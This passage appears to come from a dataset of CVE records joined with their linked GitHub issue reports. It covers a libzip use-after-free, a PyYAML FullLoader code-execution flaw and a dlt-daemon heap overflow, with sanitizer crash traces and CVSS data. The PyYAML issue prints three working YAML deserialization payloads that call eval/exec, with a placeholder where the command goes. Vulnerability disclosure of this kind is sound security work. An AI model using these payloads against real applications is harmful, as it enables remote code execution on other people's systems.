"Vendor Advisory"
],
"url": "https://libzip.org/libzip-discuss/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/nih-at/libzip/commit/2217022b7d1142738656d891e00b3d2d9179b796"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/nih-at/libzip/issues/5"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes",
"Vendor Advisory"
],
"url": "https://libzip.org/libzip-discuss/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:libzip:libzip:1.2.0:*:*:*:*:*:*:*",
"matchCriteriaId": "CBAF9F0B-71F7-4A20-9BA6-DCFCF3EA9268",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"416"
] | 416 | https://github.com/nih-at/libzip/issues/5 | [
"Third Party Advisory"
] | github.com | [
"nih-at",
"libzip"
] | On 1.2.0:
```
# ziptool $FILE cat index
==1771==ERROR: AddressSanitizer: heap-use-after-free on address 0x6030000000d1 at pc 0x7f267d085fc1 bp 0x7ffed21f65f0 sp 0x7ffed21f65e8
READ of size 1 at 0x6030000000d1 thread T0
#0 0x7f267d085fc0 in _zip_buffer_free /var/tmp/portage/dev-libs/libzip-1.2.0/work/libzip-1.2.0/lib/zip_buffer.c:53:17
#1 0x7f267d092646 in _zip_dirent_read /var/tmp/portage/dev-libs/libzip-1.2.0/work/libzip-1.2.0/lib/zip_dirent.c
#2 0x7f267d0aabfe in _zip_read_cdir /var/tmp/portage/dev-libs/libzip-1.2.0/work/libzip-1.2.0/lib/zip_open.c:380:69
#3 0x7f267d0aabfe in _zip_find_central_dir /var/tmp/portage/dev-libs/libzip-1.2.0/work/libzip-1.2.0/lib/zip_open.c:613
#4 0x7f267d0aabfe in _zip_open /var/tmp/portage/dev-libs/libzip-1.2.0/work/libzip-1.2.0/lib/zip_open.c:200
#5 0x7f267d0a89b7 in zip_open_from_source /var/tmp/portage/dev-libs/libzip-1.2.0/work/libzip-1.2.0/lib/zip_open.c:148:11
#6 0x7f267d0a7e93 in zip_open /var/tmp/portage/dev-libs/libzip-1.2.0/work/libzip-1.2.0/lib/zip_open.c:74:15
#7 0x513392 in read_from_file /var/tmp/portage/dev-libs/libzip-1.2.0/work/libzip-1.2.0/src/ziptool.c:698:13
#8 0x513392 in main /var/tmp/portage/dev-libs/libzip-1.2.0/work/libzip-1.2.0/src/ziptool.c:1113
#9 0x7f267c1b5680 in __libc_start_main /var/tmp/portage/sys-libs/glibc-2.23-r4/work/glibc-2.23/csu/../csu/libc-start.c:289
#10 0x41b058 in _init (/usr/bin/ziptool+0x41b058)
0x6030000000d1 is located 1 bytes inside of 32-byte region [0x6030000000d0,0x6030000000f0)
freed by thread T0 here:
#0 0x4d0850 in __interceptor_cfree /var/tmp/portage/sys-libs/compiler-rt-sanitizers-4.0.1/work/compiler-rt-4.0.1.src/lib/asan/asan_malloc_linux.cc:55
#1 0x7f267d085f83 in _zip_buffer_free /var/tmp/portage/dev-libs/libzip-1.2.0/work/libzip-1.2.0/lib/zip_buffer.c:57:5
#2 0x7f267d0935ea in _zip_dirent_read /var/tmp/portage/dev-libs/libzip-1.2.0/work/libzip-1.2.0/lib/zip_dirent.c:571:9
#3 0x7f267d0aabfe in _zip_read_cdir /var/tmp/portage/dev-libs/libzip-1.2.0/work/libzip-1.2.0/lib/zip_open.c:380:69
#4 0x7f267d0aabfe in _zip_find_central_dir /var/tmp/portage/dev-libs/libzip-1.2.0/work/libzip-1.2.0/lib/zip_open.c:613
#5 0x7f267d0aabfe in _zip_open /var/tmp/portage/dev-libs/libzip-1.2.0/work/libzip-1.2.0/lib/zip_open.c:200
#6 0x7f267d0a89b7 in zip_open_from_source /var/tmp/portage/dev-libs/libzip-1.2.0/work/libzip-1.2.0/lib/zip_open.c:148:11
#7 0x7f267d0a7e93 in zip_open /var/tmp/portage/dev-libs/libzip-1.2.0/work/libzip-1.2.0/lib/zip_open.c:74:15
#8 0x513392 in read_from_file /var/tmp/portage/dev-libs/libzip-1.2.0/work/libzip-1.2.0/src/ziptool.c:698:13
#9 0x513392 in main /var/tmp/portage/dev-libs/libzip-1.2.0/work/libzip-1.2.0/src/ziptool.c:1113
#10 0x7f267c1b5680 in __libc_start_main /var/tmp/portage/sys-libs/glibc-2.23-r4/work/glibc-2.23/csu/../csu/libc-start.c:289
previously allocated by thread T0 here:
#0 0x4d0a08 in malloc /var/tmp/portage/sys-libs/compiler-rt-sanitizers-4.0.1/work/compiler-rt-4.0.1.src/lib/asan/asan_malloc_linux.cc:66
#1 0x7f267d0879d8 in _zip_buffer_new /var/tmp/portage/dev-libs/libzip-1.2.0/work/libzip-1.2.0/lib/zip_buffer.c:168:35
#2 0x7f267d0879d8 in _zip_buffer_new_from_source /var/tmp/portage/dev-libs/libzip-1.2.0/work/libzip-1.2.0/lib/zip_buffer.c:190
#3 0x7f267d0927c2 in _zip_dirent_read /var/tmp/portage/dev-libs/libzip-1.2.0/work/libzip-1.2.0/lib/zip_dirent.c:443:23
#4 0x7f267d0aabfe in _zip_read_cdir /var/tmp/portage/dev-libs/libzip-1.2.0/work/libzip-1.2.0/lib/zip_open.c:380:69
#5 0x7f267d0aabfe in _zip_find_central_dir /var/tmp/portage/dev-libs/libzip-1.2.0/work/libzip-1.2.0/lib/zip_open.c:613
#6 0x7f267d0aabfe in _zip_open /var/tmp/portage/dev-libs/libzip-1.2.0/work/libzip-1.2.0/lib/zip_open.c:200
#7 0x7f267d0a89b7 in zip_open_from_source /var/tmp/portage/dev-libs/libzip-1.2.0/work/libzip-1.2.0/lib/zip_open.c:148:11
#8 0x7f267d0a7e93 in zip_open /var/tmp/portage/dev-libs/libzip-1.2.0/work/libzip-1.2.0/lib/zip_open.c:74:15
#9 0x513392 in read_from_file /var/tmp/portage/dev-libs/libzip-1.2.0/work/libzip-1.2.0/src/ziptool.c:698:13
#10 0x513392 in main /var/tmp/portage/dev-libs/libzip-1.2.0/work/libzip-1.2.0/src/ziptool.c:1113
#11 0x7f267c1b5680 in __libc_start_main /var/tmp/portage/sys-libs/glibc-2.23-r4/work/glibc-2.23/csu/../csu/libc-start.c:289
SUMMARY: AddressSanitizer: heap-use-after-free /var/tmp/portage/dev-libs/libzip-1.2.0/work/libzip-1.2.0/lib/zip_buffer.c:53:17 in _zip_buffer_free
Shadow bytes around the buggy address:
0x0c067fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c067fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c067fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c067fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c067fff8000: fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa fd fd
=>0x0c067fff8010: fd fd fa fa fd fd fd fd fa fa[fd]fd fd fd fa fa
0x0c067fff8020: 00 00 00 00 fa fa fd fd fd fa fa fa fd fd fd fd
0x0c067fff8030: fa fa 00 00 00 fa fa fa 00 00 00 fa fa fa 00 00
0x0c067fff8040: 00 fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c067fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c067fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==1771==ABORTING
```
Testcase:
https://github.com/asarubbo/poc/blob/master/00239-libzip-UAF-_zip_buffer_free
I don't know if it is related to the bug fixed here https://github.com/nih-at/libzip/commit/2217022b7d1142738656d891e00b3d2d9179b796 | use-after-free in _zip_buffer_free (zip_buffer.c) | https://api.github.com/repos/nih-at/libzip/issues/5/comments | 2 | 2017-08-24T10:44:17Z | 2017-09-01T13:51:10Z | https://github.com/nih-at/libzip/issues/5 | 252,561,553 | 5 | 1,699 |
CVE-2020-14343 | 2021-02-09T21:15:12.707 | A vulnerability was discovered in the PyYAML library in versions before 5.4, where it is susceptible to arbitrary code execution when it processes untrusted YAML files through the full_load method or with the FullLoader loader. Applications that use the library to process untrusted input may be vulnerable to this flaw. This flaw allows an attacker to execute arbitrary code on the system by abusing the python/object/new constructor. This flaw is due to an incomplete fix for CVE-2020-1747. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "COMPLETE",
"baseScore": 10,
"confidentialityImpact": "COMPLETE",
"integrityImpact": "COMPLETE",
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 10,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "secalert@redhat.com",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1860466"
},
{
"source": "secalert@redhat.com",
"tags": null,
"url": "https://github.com/SeldonIO/seldon-core/issues/2252"
},
{
"source": "secalert@redhat.com",
"tags": null,
"url": "https://github.com/yaml/pyyaml/issues/420"
},
{
"source": "secalert@redhat.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpuapr2022.html"
},
{
"source": "secalert@redhat.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpujul2022.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1860466"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://github.com/SeldonIO/seldon-core/issues/2252"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://github.com/yaml/pyyaml/issues/420"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpuapr2022.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpujul2022.html"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:pyyaml:pyyaml:*:*:*:*:*:*:*:*",
"matchCriteriaId": "5B49BB31-68E9-4F02-8D00-925418F7372C",
"versionEndExcluding": "5.4",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "5.1",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:oracle:communications_cloud_native_core_network_function_cloud_native_environment:1.10.0:*:*:*:*:*:*:*",
"matchCriteriaId": "C2A5B24D-BDF2-423C-98EA-A40778C01A05",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:communications_cloud_native_core_network_function_cloud_native_environment:22.1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "04E6C8E9-2024-496C-9BFD-4548A5B44E2E",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"20"
] | 20 | https://github.com/SeldonIO/seldon-core/issues/2252 | null | github.com | [
"SeldonIO",
"seldon-core"
] | Report [here](https://snyk.io/vuln/SNYK-PYTHON-PYYAML-590151)
Redhat report [here](https://access.redhat.com/security/cve/cve-2020-14343)
WIP in [pyaml project](https://github.com/yaml/pyyaml/issues/420) | Resolve CVE for PyYAML - CVE-2020-14343 | https://api.github.com/repos/SeldonIO/seldon-core/issues/2252/comments | 2 | 2020-08-07T07:51:11Z | 2021-01-27T12:41:45Z | https://github.com/SeldonIO/seldon-core/issues/2252 | 674,833,414 | 2,252 | 1,700 |
CVE-2020-14343 | 2021-02-09T21:15:12.707 | A vulnerability was discovered in the PyYAML library in versions before 5.4, where it is susceptible to arbitrary code execution when it processes untrusted YAML files through the full_load method or with the FullLoader loader. Applications that use the library to process untrusted input may be vulnerable to this flaw. This flaw allows an attacker to execute arbitrary code on the system by abusing the python/object/new constructor. This flaw is due to an incomplete fix for CVE-2020-1747. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "COMPLETE",
"baseScore": 10,
"confidentialityImpact": "COMPLETE",
"integrityImpact": "COMPLETE",
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 10,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "secalert@redhat.com",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1860466"
},
{
"source": "secalert@redhat.com",
"tags": null,
"url": "https://github.com/SeldonIO/seldon-core/issues/2252"
},
{
"source": "secalert@redhat.com",
"tags": null,
"url": "https://github.com/yaml/pyyaml/issues/420"
},
{
"source": "secalert@redhat.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpuapr2022.html"
},
{
"source": "secalert@redhat.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpujul2022.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1860466"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://github.com/SeldonIO/seldon-core/issues/2252"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://github.com/yaml/pyyaml/issues/420"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpuapr2022.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpujul2022.html"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:pyyaml:pyyaml:*:*:*:*:*:*:*:*",
"matchCriteriaId": "5B49BB31-68E9-4F02-8D00-925418F7372C",
"versionEndExcluding": "5.4",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "5.1",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:oracle:communications_cloud_native_core_network_function_cloud_native_environment:1.10.0:*:*:*:*:*:*:*",
"matchCriteriaId": "C2A5B24D-BDF2-423C-98EA-A40778C01A05",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:communications_cloud_native_core_network_function_cloud_native_environment:22.1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "04E6C8E9-2024-496C-9BFD-4548A5B44E2E",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"20"
] | 20 | https://github.com/yaml/pyyaml/issues/420 | null | github.com | [
"yaml",
"pyyaml"
] | As of 5.3.1 .load() defaults to using FullLoader and FullLoader is still vulnerable to RCE when run on untrusted input. As demonstrated by the examples below, #386 was not enough to fix this issue.
Some example payloads:
```
!!python/object/new:tuple
- !!python/object/new:map
- !!python/name:eval
- [ "RCE_HERE" ]
```
```
!!python/object/new:type
args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
listitems: "RCE_HERE"
```
```
- !!python/object/new:str
args: []
state: !!python/tuple
- "RCE_HERE"
- !!python/object/new:staticmethod
args: [0]
state:
update: !!python/name:exec
```
I do not believe this is entirely fixable unless PyYAML decides to use secure defaults, and make .load() equivalent to .safe_load() ( #5 )
FullLoader should probably be removed, as I don't see the purpose of it. | .load() and FullLoader still vulnerable to fairly trivial RCE | https://api.github.com/repos/yaml/pyyaml/issues/420/comments | 44 | 2020-07-22T08:18:35Z | 2021-09-28T17:21:40Z | https://github.com/yaml/pyyaml/issues/420 | 663,569,505 | 420 | 1,701 |
CVE-2020-36244 | 2021-02-10T07:15:12.833 | The daemon in GENIVI diagnostic log and trace (DLT), is vulnerable to a heap-based buffer overflow that could allow an attacker to remotely execute arbitrary code on the DLT-Daemon (versions prior to 2.18.6). | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/GENIVI/dlt-daemon/compare/v2.18.5...v2.18.6"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/GENIVI/dlt-daemon/issues/265"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00016.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory",
"US Government Resource"
],
"url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-147-01"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/GENIVI/dlt-daemon/compare/v2.18.5...v2.18.6"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/GENIVI/dlt-daemon/issues/265"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00016.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"US Government Resource"
],
"url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-147-01"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:genivi:diagnostic_log_and_trace:*:*:*:*:*:*:*:*",
"matchCriteriaId": "9F4D7936-540E-459D-940C-5C87706FB017",
"versionEndExcluding": "2.18.6",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*",
"matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/GENIVI/dlt-daemon/issues/265 | [
"Third Party Advisory"
] | github.com | [
"GENIVI",
"dlt-daemon"
] | Hello,
I have fuzzed dlt-daemon to search for bugs using the Tool [CI-Fuzz](https://www.code-intelligence.com/). I think I found a write heap buffer overflow in the function dlt_buffer_write_block. You can find the full crash report below. This is from a fuzz test I wrote to execute the function dlt_buffer_push with fuzzer generated inputs.
After having a look at the code it seems that there is no size check before writing to the ring buffer: There is no check if size<=buf->size in dlt_buffer_write_block.
As far as I can say this condition isn't checked elsewhere. Since buffer overflows can often be used to get arbitrary code execution this is a potential security issue. Using the dlt_daemon_client_send function a connected dlt user could write into the memory of the daemon and possibly gain arbitrary code execution.
I think this could be fixed by changing the if condition in dlt_common.c:2508 (in function dlt_buffer_push3) into a while loop.
If you need further information or discussion I'm happy to help as far as I can.
==14==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6260003ec810 at pc 0x000000495890 bp 0x7ffca5a15a50 sp 0x7ffca5a15218
WRITE of size 10006 at 0x6260003ec810 thread T0
#0 0x49588f in __asan_memcpy /llvmbuild/llvm-project-llvmorg-10.0.0/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cpp:22:3
#1 0x7fe86a1c316b in dlt_buffer_write_block /home/user/.local/share/code-intelligence/projects/dlt-daemon-8b34ed1f/libfuzzer/address/src/shared/dlt_common.c:2281:13
#2 0x7fe86a1cf7b9 in dlt_buffer_push3 /home/user/.local/share/code-intelligence/projects/dlt-daemon-8b34ed1f/libfuzzer/address/src/shared/dlt_common.c:2530:9
#3 0x7fe86a1cd2ca in dlt_buffer_push /home/user/.local/share/code-intelligence/projects/dlt-daemon-8b34ed1f/libfuzzer/address/src/shared/dlt_common.c:2460:12
#4 0x4c5cda in LLVMFuzzerTestOneInput /home/user/.local/share/code-intelligence/projects/dlt-daemon-8b34ed1f/libfuzzer/address/.code-intelligence/fuzz_targets/fuzz_dlt_common_dlt_buffer_push.c:81:4
#5 0x4feb61 in fuzzer::Fuzzer::ExecuteCallback(unsigned char const*, unsigned long) /llvmbuild/llvm-project-llvmorg-10.0.0/compiler-rt/lib/fuzzer/FuzzerLoop.cpp:556:15
#6 0x4fe2a5 in fuzzer::Fuzzer::RunOne(unsigned char const*, unsigned long, bool, fuzzer::InputInfo*, bool*) /llvmbuild/llvm-project-llvmorg-10.0.0/compiler-rt/lib/fuzzer/FuzzerLoop.cpp:470:3
#7 0x500bc7 in fuzzer::Fuzzer::ReadAndExecuteSeedCorpora(std::__Fuzzer::vector<fuzzer::SizedFile, fuzzer::fuzzer_allocator<fuzzer::SizedFile> >&) /llvmbuild/llvm-project-llvmorg-10.0.0/compiler-rt/lib/fuzzer/FuzzerLoop.cpp:765:7
#8 0x500f29 in fuzzer::Fuzzer::Loop(std::__Fuzzer::vector<fuzzer::SizedFile, fuzzer::fuzzer_allocator<fuzzer::SizedFile> >&) /llvmbuild/llvm-project-llvmorg-10.0.0/compiler-rt/lib/fuzzer/FuzzerLoop.cpp:792:3
#9 0x4efbee in fuzzer::FuzzerDriver(int*, char***, int (*)(unsigned char const*, unsigned long)) /llvmbuild/llvm-project-llvmorg-10.0.0/compiler-rt/lib/fuzzer/FuzzerDriver.cpp:829:6
#10 0x518a22 in main /llvmbuild/llvm-project-llvmorg-10.0.0/compiler-rt/lib/fuzzer/FuzzerMain.cpp:19:10
#11 0x7fe869bb00b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
#12 0x41de5d in _start (/projects/dlt-daemon-8b34ed1f/libfuzzer/address/fuzz_dlt_common_dlt_buffer_push+0x41de5d)
0x6260003ec810 is located 0 bytes to the right of 10000-byte region [0x6260003ea100,0x6260003ec810)
allocated by thread T0 here:
#0 0x49638d in malloc /llvmbuild/llvm-project-llvmorg-10.0.0/compiler-rt/lib/asan/asan_malloc_linux.cpp:145:3
#1 0x7fe86a1c5f2e in dlt_buffer_increase_size /home/user/.local/share/code-intelligence/projects/dlt-daemon-8b34ed1f/libfuzzer/address/src/shared/dlt_common.c:2344:15
#2 0x7fe86a1cec2f in dlt_buffer_push3 /home/user/.local/share/code-intelligence/projects/dlt-daemon-8b34ed1f/libfuzzer/address/src/shared/dlt_common.c:2510:13
#3 0x7fe86a1cd2ca in dlt_buffer_push /home/user/.local/share/code-intelligence/projects/dlt-daemon-8b34ed1f/libfuzzer/address/src/shared/dlt_common.c:2460:12
#4 0x4c5cda in LLVMFuzzerTestOneInput /home/user/.local/share/code-intelligence/projects/dlt-daemon-8b34ed1f/libfuzzer/address/.code-intelligence/fuzz_targets/fuzz_dlt_common_dlt_buffer_push.c:81:4
#5 0x4feb61 in fuzzer::Fuzzer::ExecuteCallback(unsigned char const*, unsigned long) /llvmbuild/llvm-project-llvmorg-10.0.0/compiler-rt/lib/fuzzer/FuzzerLoop.cpp:556:15
#6 0x4fe2a5 in fuzzer::Fuzzer::RunOne(unsigned char const*, unsigned long, bool, fuzzer::InputInfo*, bool*) /llvmbuild/llvm-project-llvmorg-10.0.0/compiler-rt/lib/fuzzer/FuzzerLoop.cpp:470:3
#7 0x500bc7 in fuzzer::Fuzzer::ReadAndExecuteSeedCorpora(std::__Fuzzer::vector<fuzzer::SizedFile, fuzzer::fuzzer_allocator<fuzzer::SizedFile> >&) /llvmbuild/llvm-project-llvmorg-10.0.0/compiler-rt/lib/fuzzer/FuzzerLoop.cpp:765:7
#8 0x500f29 in fuzzer::Fuzzer::Loop(std::__Fuzzer::vector<fuzzer::SizedFile, fuzzer::fuzzer_allocator<fuzzer::SizedFile> >&) /llvmbuild/llvm-project-llvmorg-10.0.0/compiler-rt/lib/fuzzer/FuzzerLoop.cpp:792:3
#9 0x4efbee in fuzzer::FuzzerDriver(int*, char***, int (*)(unsigned char const*, unsigned long)) /llvmbuild/llvm-project-llvmorg-10.0.0/compiler-rt/lib/fuzzer/FuzzerDriver.cpp:829:6
#10 0x518a22 in main /llvmbuild/llvm-project-llvmorg-10.0.0/compiler-rt/lib/fuzzer/FuzzerMain.cpp:19:10
#11 0x7fe869bb00b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
SUMMARY: AddressSanitizer: heap-buffer-overflow /llvmbuild/llvm-project-llvmorg-10.0.0/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cpp:22:3 in __asan_memcpy
Shadow bytes around the buggy address:
0x0c4c800758b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c4c800758c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c4c800758d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c4c800758e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c4c800758f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c4c80075900: 00 00[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c4c80075910: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c4c80075920: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c4c80075930: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c4c80075940: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
